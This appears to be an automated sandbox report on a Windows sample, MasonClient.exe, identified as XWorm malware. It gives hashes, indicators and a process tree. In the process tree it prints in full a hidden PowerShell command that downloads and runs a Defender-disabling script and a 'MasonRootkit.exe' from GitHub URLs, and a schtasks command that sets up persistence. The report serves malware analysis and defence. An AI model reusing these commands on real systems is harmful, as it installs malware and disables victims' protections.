Analysis
-
max time kernel
132s -
max time network
140s -
platform
windows7_x64 -
resource
win7-20241023-en -
resource tags
arch:x64arch:x86image:win7-20241023-enlocale:en-usos:windows7-x64system -
submitted
28/03/2025, 11:07
Static task
static1
Behavioral task
behavioral1
Sample
MasonClient.exe
Resource
win7-20241023-en
Behavioral task
behavioral2
Sample
MasonClient.exe
Resource
win10v2004-20250313-en
General
-
Target
MasonClient.exe
-
Size
154KB
-
MD5
7d808e886ceceac50433176d38872344
-
SHA1
5c94426cb6e7cd3351b6864b7a92b651bcaaec5b
-
SHA256
5b653d9ea95075ea952b923d37e91be40839557f4cf8b2377514ddf9b87de3e8
-
SHA512
f4c1efc58ce8a4bc7d9e2eb5ec93892943cc718e825fc7094599ead926c9e95c2e8aafe3f0c0892c06792394a9664ad5370714b5a0f03ee1508ab1bceec0fecb
-
SSDEEP
3072:Zhh64XFzyb0S/XbOJzOOOOOOOHOOOOOOO/OOOOOOOp:rXXAbyOOOOOOOHOOOOOOO/OOOOOOO
Malware Config
Extracted
https://github.com/charlie-60/R/raw/refs/heads/main/MasonRootkit.exe
https://raw.githubusercontent.com/ninhpn1337/Disable-Windows-Defender/main/source.bat
Extracted
xworm
-
install_file
MasonUSB.exe
Signatures
-
Detect Xworm Payload 1 IoCs
resource yara_rule behavioral1/memory/848-49-0x000000001AD20000-0x000000001AD32000-memory.dmp family_xworm -
Xworm family
-
Blocklisted process makes network request 2 IoCs
flow pid Process 5 2608 powershell.exe 6 2608 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
pid Process 2608 powershell.exe -
Executes dropped EXE 3 IoCs
pid Process 2560 MasonClient.exe 2364 MasonClient.exe 1088 MasonClient.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 8 raw.githubusercontent.com 9 raw.githubusercontent.com -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2844 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2608 powershell.exe -
Suspicious use of AdjustPrivilegeToken 5 IoCs
description pid Process Token: SeDebugPrivilege 848 MasonClient.exe Token: SeDebugPrivilege 2608 powershell.exe Token: SeDebugPrivilege 2560 MasonClient.exe Token: SeDebugPrivilege 2364 MasonClient.exe Token: SeDebugPrivilege 1088 MasonClient.exe -
Suspicious use of WriteProcessMemory 15 IoCs
description pid Process procid_target PID 848 wrote to memory of 2608 848 MasonClient.exe 30 PID 848 wrote to memory of 2608 848 MasonClient.exe 30 PID 848 wrote to memory of 2608 848 MasonClient.exe 30 PID 848 wrote to memory of 2844 848 MasonClient.exe 32 PID 848 wrote to memory of 2844 848 MasonClient.exe 32 PID 848 wrote to memory of 2844 848 MasonClient.exe 32 PID 352 wrote to memory of 2560 352 taskeng.exe 36 PID 352 wrote to memory of 2560 352 taskeng.exe 36 PID 352 wrote to memory of 2560 352 taskeng.exe 36 PID 352 wrote to memory of 2364 352 taskeng.exe 37 PID 352 wrote to memory of 2364 352 taskeng.exe 37 PID 352 wrote to memory of 2364 352 taskeng.exe 37 PID 352 wrote to memory of 1088 352 taskeng.exe 38 PID 352 wrote to memory of 1088 352 taskeng.exe 38 PID 352 wrote to memory of 1088 352 taskeng.exe 38 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\MasonClient.exe"C:\Users\Admin\AppData\Local\Temp\MasonClient.exe"1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:848 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "$settings = '{\"WD\": false, \"adminrun\": false}' | ConvertFrom-Json; $randomString = \"2PewmOBXXq\"; if ($settings.WD) { $settings.adminrun = $true; (New-Object System.Net.WebClient).DownloadFile(\"https://raw.githubusercontent.com/ninhpn1337/Disable-Windows-Defender/main/source.bat\", $env:TEMP + '\' + $randomString + '.bat'); Start-Process -FilePath ($env:TEMP + '\' + $randomString + '.bat') -WindowStyle Hidden -Wait -Verb RunAs; }; if ($settings.adminrun) { $url = \"https://github.com/charlie-60/R/raw/refs/heads/main/MasonRootkit.exe\"; $outputPath = $env:TEMP + '\' + 'MasonRootkit.exe'; (New-Object System.Net.WebClient).DownloadFile($url, $outputPath); Start-Process $outputPath -Verb RunAs; } else { $url = \"https://github.com/charlie-60/R/raw/refs/heads/main/MasonRootkit.exe\"; $outputPath = $env:TEMP + '\' + 'MasonRootkit.exe'; (New-Object System.Net.WebClient).DownloadFile($url, $outputPath); Start-Process $outputPath; }"2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2608
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /f /sc minute /mo 1 /tn "MasonClient" /tr "C:\Users\Admin\AppData\Roaming\MasonClient.exe"2⤵
- Scheduled Task/Job: Scheduled Task
PID:2844
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {AAA38C3B-DB13-4FCB-AC0F-EFFC97B72BC3} S-1-5-21-1163522206-1469769407-485553996-1000:PJCSDMRP\Admin:Interactive:[1]1⤵
- Suspicious use of WriteProcessMemory
PID:352 -
C:\Users\Admin\AppData\Roaming\MasonClient.exeC:\Users\Admin\AppData\Roaming\MasonClient.exe2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2560
-
-
C:\Users\Admin\AppData\Roaming\MasonClient.exeC:\Users\Admin\AppData\Roaming\MasonClient.exe2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2364
-
-
C:\Users\Admin\AppData\Roaming\MasonClient.exeC:\Users\Admin\AppData\Roaming\MasonClient.exe2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1088
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
71KB
MD583142242e97b8953c386f988aa694e4a
SHA1833ed12fc15b356136dcdd27c61a50f59c5c7d50
SHA256d72761e1a334a754ce8250e3af7ea4bf25301040929fd88cf9e50b4a9197d755
SHA512bb6da177bd16d163f377d9b4c63f6d535804137887684c113cc2f643ceab4f34338c06b5a29213c23d375e95d22ef417eac928822dfb3688ce9e2de9d5242d10
-
Filesize
183KB
MD5109cab5505f5e065b63d01361467a83b
SHA14ed78955b9272a9ed689b51bf2bf4a86a25e53fc
SHA256ea6b7f51e85835c09259d9475a7d246c3e764ad67c449673f9dc97172c351673
SHA512753a6da5d6889dd52f40208e37f2b8c185805ef81148682b269fff5aa84a46d710fe0ebfe05bce625da2e801e1c26745998a41266fa36bf47bc088a224d730cc
-
Filesize
154KB
MD57d808e886ceceac50433176d38872344
SHA15c94426cb6e7cd3351b6864b7a92b651bcaaec5b
SHA2565b653d9ea95075ea952b923d37e91be40839557f4cf8b2377514ddf9b87de3e8
SHA512f4c1efc58ce8a4bc7d9e2eb5ec93892943cc718e825fc7094599ead926c9e95c2e8aafe3f0c0892c06792394a9664ad5370714b5a0f03ee1508ab1bceec0fecb